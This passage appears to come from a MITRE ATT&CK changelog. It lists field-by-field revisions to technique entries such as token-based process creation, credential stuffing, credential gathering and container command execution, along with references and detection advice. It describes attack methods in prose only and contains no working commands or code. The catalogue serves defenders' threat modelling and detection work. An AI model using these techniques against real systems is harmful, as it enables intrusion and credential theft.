x_mitre_permissions_required | ['User', 'Administrator'] |
values_changed
STIX Field | Old value | New value
modified | 2022-04-01 13:11:10.849000+00:00 | 2023-04-15 16:11:25.409000+00:00
external_references[1]['source_name'] | Docker API | Unit 42 Unsecured Docker Daemons
external_references[1]['description'] | Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021. | Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.
external_references[1]['url'] | https://docs.docker.com/engine/api/v1.41/ | https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/
external_references[2]['source_name'] | Kubernetes API | Docker API
external_references[2]['description'] | The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021. | Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.
external_references[2]['url'] | https://kubernetes.io/docs/concepts/overview/kubernetes-api/ | https://docs.docker.com/engine/api/v1.41/
external_references[3]['source_name'] | Unit 42 Unsecured Docker Daemons | Kubernetes API
external_references[3]['description'] | Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021. | The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.
external_references[3]['url'] | https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/ | https://kubernetes.io/docs/concepts/overview/kubernetes-api/
x_mitre_version | 1.1 | 1.2

[T1609] Container Administration Command

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2022-04-01 13:16:14.786000+00:00 | 2023-04-15 16:03:19.642000+00:00
external_references[1]['source_name'] | Docker Daemon CLI | Docker Exec
external_references[1]['description'] | Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021. | Docker. (n.d.). Docker Exec. Retrieved March 29, 2021.
external_references[1]['url'] | https://docs.docker.com/engine/reference/commandline/dockerd/ | https://docs.docker.com/engine/reference/commandline/exec/
external_references[2]['source_name'] | Kubernetes API | Docker Entrypoint
external_references[2]['description'] | The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021. | Docker. (n.d.). Docker run reference. Retrieved March 29, 2021.
external_references[2]['url'] | https://kubernetes.io/docs/concepts/overview/kubernetes-api/ | https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime
external_references[3]['source_name'] | Kubernetes Kubelet | Docker Daemon CLI
external_references[3]['description'] | The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, 2021. | Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021.
external_references[3]['url'] | https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/ | https://docs.docker.com/engine/reference/commandline/dockerd/
external_references[4]['source_name'] | Docker Entrypoint | Kubectl Exec Get Shell
external_references[4]['description'] | Docker. (n.d.). Docker run reference. Retrieved March 29, 2021. | The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. Retrieved March 29, 2021.
external_references[4]['url'] | https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime | https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/
external_references[5]['source_name'] | Docker Exec | Kubernetes Kubelet
external_references[5]['description'] | Docker. (n.d.). Docker Exec. Retrieved March 29, 2021. | The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, 2021.
external_references[5]['url'] | https://docs.docker.com/engine/reference/commandline/exec/ | https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/
external_references[6]['source_name'] | Kubectl Exec Get Shell | Kubernetes API
external_references[6]['description'] | The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. Retrieved March 29, 2021. | The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.
external_references[6]['url'] | https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/ | https://kubernetes.io/docs/concepts/overview/kubernetes-api/
x_mitre_version | 1.1 | 1.2

[T1053.007] Scheduled Task/Job: Container Orchestration Job

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2022-04-01 13:06:58.794000+00:00 | 2023-04-15 16:23:05.392000+00:00
external_references[1]['source_name'] | Kubernetes Jobs | Kubernetes CronJob
external_references[1]['description'] | The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021. | The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021.
external_references[1]['url'] | https://kubernetes.io/docs/concepts/workloads/controllers/job/ | https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/
external_references[2]['source_name'] | Kubernetes CronJob | Kubernetes Jobs
external_references[2]['description'] | The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021. | The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021.
external_references[2]['url'] | https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ | https://kubernetes.io/docs/concepts/workloads/controllers/job/
x_mitre_data_sources[0] | File: File Creation | Scheduled Job: Scheduled Job Creation
x_mitre_data_sources[2] | Scheduled Job: Scheduled Job Creation | File: File Creation
x_mitre_version | 1.2 | 1.3

[T1613] Container and Resource Discovery

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_permissions_required | ['User'] |
values_changed
STIX Field | Old value | New value
modified | 2021-04-12 18:22:05.737000+00:00 | 2023-04-15 16:08:50.706000+00:00
x_mitre_version | 1.0 | 1.1

[T1136] Create Account

Current version: 2.3

Version changed from: 2.2 → 2.3

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_permissions_required | ['Administrator'] |
values_changed
STIX Field | Old value | New value
modified | 2021-08-12 13:04:14.534000+00:00 | 2023-04-12 23:24:48.840000+00:00
x_mitre_version | 2.2 | 2.3
iterable_item_added
STIX Field | Old value | New value
x_mitre_contributors | | Austin Clark, @c2defense
x_mitre_data_sources | | Process: Process Creation
x_mitre_platforms | | Network
iterable_item_removed
STIX Field | Old value | New value
x_mitre_data_sources | Process: Process Creation |

[T1134.002] Access Token Manipulation: Create Process with Token

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description

Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as `CreateProcessWithTokenW` and `runas`.(Citation: Microsoft RunAs) Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).

New Description

Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as `CreateProcessWithTokenW` and `runas`.(Citation: Microsoft RunAs) Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process. While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.
Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-10-17 14:51:48.978000+00:00 | 2023-04-11 21:14:37.714000+00:00
description | Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs) Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)). | Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs) Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process. While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.
external_references[1]['source_name'] | Microsoft RunAs | Microsoft Command-line Logging
external_references[1]['description'] | Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021. | Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.
external_references[1]['url'] | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11) | https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing
external_references[2]['source_name'] | Microsoft Command-line Logging | Microsoft RunAs
external_references[2]['description'] | Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017. | Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.
external_references[2]['url'] | https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)
x_mitre_data_sources[0] | Command: Command Execution | Process: OS API Execution
x_mitre_data_sources[1] | Process: OS API Execution | Command: Command Execution
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New value
x_mitre_contributors | | Jonny Johnson

[T1110.004] Brute Force: Credential Stuffing

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
external_references | | US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_permissions_required | ['User'] |
external_references | CAPEC-600 |
values_changed
STIX Field | Old value | New value
modified | 2021-04-06 12:31:06.695000+00:00 | 2023-04-14 23:05:16.857000+00:00
external_references[1]['source_name'] | capec | US-CERT TA18-068A 2018
external_references[1]['url'] | https://capec.mitre.org/data/definitions/600.html | https://www.us-cert.gov/ncas/alerts/TA18-086A
x_mitre_data_sources[0] | User Account: User Account Authentication | Application Log: Application Log Content
x_mitre_data_sources[1] | Application Log: Application Log Content | User Account: User Account Authentication
x_mitre_version | 1.2 | 1.3
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'US-CERT TA18-068A 2018', 'description': 'US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-086A'} |

[T1589.001] Gather Victim Identity Information: Credentials

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description

Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

New Description

Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-15 03:26:44.352000+00:00 | 2023-04-14 23:29:10.396000+00:00
description | Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). | Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
external_references[2]['source_name'] | Register Deloitte | Detectify Slack Tokens
external_references[2]['description'] | Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020. | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.
external_references[2]['url'] | https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/ | https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/
external_references[3]['source_name'] | Register Uber | GitHub truffleHog
external_references[3]['description'] | McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020. | Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.
external_references[3]['url'] | https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/ | https://github.com/dxa4481/truffleHog
external_references[4]['source_name'] | Detectify Slack Tokens | Register Uber
external_references[4]['description'] | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020. | McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.
external_references[4]['url'] | https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/ | https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/
external_references[5]['source_name'] | Forbes GitHub Creds | GitHub Gitrob
external_references[5]['description'] | Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020. | Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.
external_references[5]['url']https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196https://github.com/michenriksen/gitrob
external_references[6]['source_name']GitHub truffleHogCNET Leaks
external_references[6]['description']Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.
external_references[6]['url']https://github.com/dxa4481/truffleHoghttps://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/
external_references[7]['source_name']GitHub GitrobOkta Scatter Swine 2022
external_references[7]['description']Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.
external_references[7]['url']https://github.com/michenriksen/gitrobhttps://sec.okta.com/scatterswine
external_references[8]['source_name']CNET LeaksForbes GitHub Creds
external_references[8]['description']Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.
external_references[8]['url']https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Register Deloitte', 'description': "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.", 'url': 'https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/'}

[T1132] Data Encoding

Current version: 1.2

Version changed from: 1.1 → 1.2

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_permissions_required | ['User'] |
values_changed
STIX Field | Old value | New value
modified | 2020-03-14 23:39:50.338000+00:00 | 2023-04-21 12:20:20.711000+00:00
external_references[1]['source_name'] | Wikipedia Binary-to-text Encoding | University of Birmingham C2
external_references[1]['description'] | Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017. | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
external_references[1]['url'] | https://en.wikipedia.org/wiki/Binary-to-text_encoding | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
external_references[2]['source_name'] | Wikipedia Character Encoding | Wikipedia Binary-to-text Encoding
external_references[2]['description'] | Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017. | Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.
external_references[2]['url'] | https://en.wikipedia.org/wiki/Character_encoding | https://en.wikipedia.org/wiki/Binary-to-text_encoding
external_references[3]['source_name'] | University of Birmingham C2 | Wikipedia Character Encoding
external_references[3]['description'] | Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. | Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.
external_references[3]['url'] | https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf | https://en.wikipedia.org/wiki/Character_encoding
x_mitre_version | 1.1 | 1.2

[T1005] Data from Local System

Current version: 1.6

Version changed from: 1.5 → 1.6


Old Description
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.

New Description
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-19 21:55:54.866000+00:00 | 2023-04-12 23:54:39.466000+00:00
description | Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. | Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
external_references[1]['source_name'] | Mandiant APT41 Global Intrusion | show_run_config_cmd_cisco
external_references[1]['description'] | Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022. | Cisco. (2022, August 16). show running-config - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.
external_references[1]['url'] | https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733
external_references[2]['source_name'] | US-CERT-TA18-106A | Mandiant APT41 Global Intrusion
external_references[2]['description'] | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. | Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.
external_references[2]['url'] | https://www.us-cert.gov/ncas/alerts/TA18-106A | https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Process: OS API Execution | Command: Command Execution
x_mitre_data_sources[1] | File: File Access | Process: Process Creation
x_mitre_data_sources[2] | Process: Process Creation | File: File Access
x_mitre_data_sources[3] | Script: Script Execution | Process: OS API Execution
x_mitre_data_sources[4] | Command: Command Execution | Script: Script Execution
x_mitre_detection | Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). For network infrastructure devices, collect AAA logging to monitor `show` commands that view configuration files.
x_mitre_version | 1.5 | 1.6
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}

[T1140] Deobfuscate/Decode Files or Information

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016) Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)

New Description
Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016) Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New value
modified | 2022-05-05 04:05:42.508000+00:00 | 2023-04-21 12:21:06.026000+00:00
description | Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016) Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) | Adversaries may use [Obfuscated Files or 